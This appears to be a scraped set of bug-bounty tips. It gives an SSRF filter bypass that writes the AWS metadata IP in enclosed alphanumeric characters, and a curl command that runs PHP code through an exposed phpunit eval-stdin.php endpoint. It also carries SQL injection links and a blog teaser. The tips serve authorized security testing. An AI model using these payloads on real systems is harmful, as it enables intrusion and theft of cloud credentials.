Bypassing SSRF Filter using Enclosed Alphanumerics
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
  AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
#bugbountytip If you found /phpunit/ folder than you can try to execute PHP code by typing the following command:
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
#Sqli #bugbounty
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
  
  https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
Yappare
  
  Tricky Oracle SQL Injection Situation
  Recently I learnt few new stuff when solving SQL Injection found during pentest and also bugbounty. One of the new technique that seems new...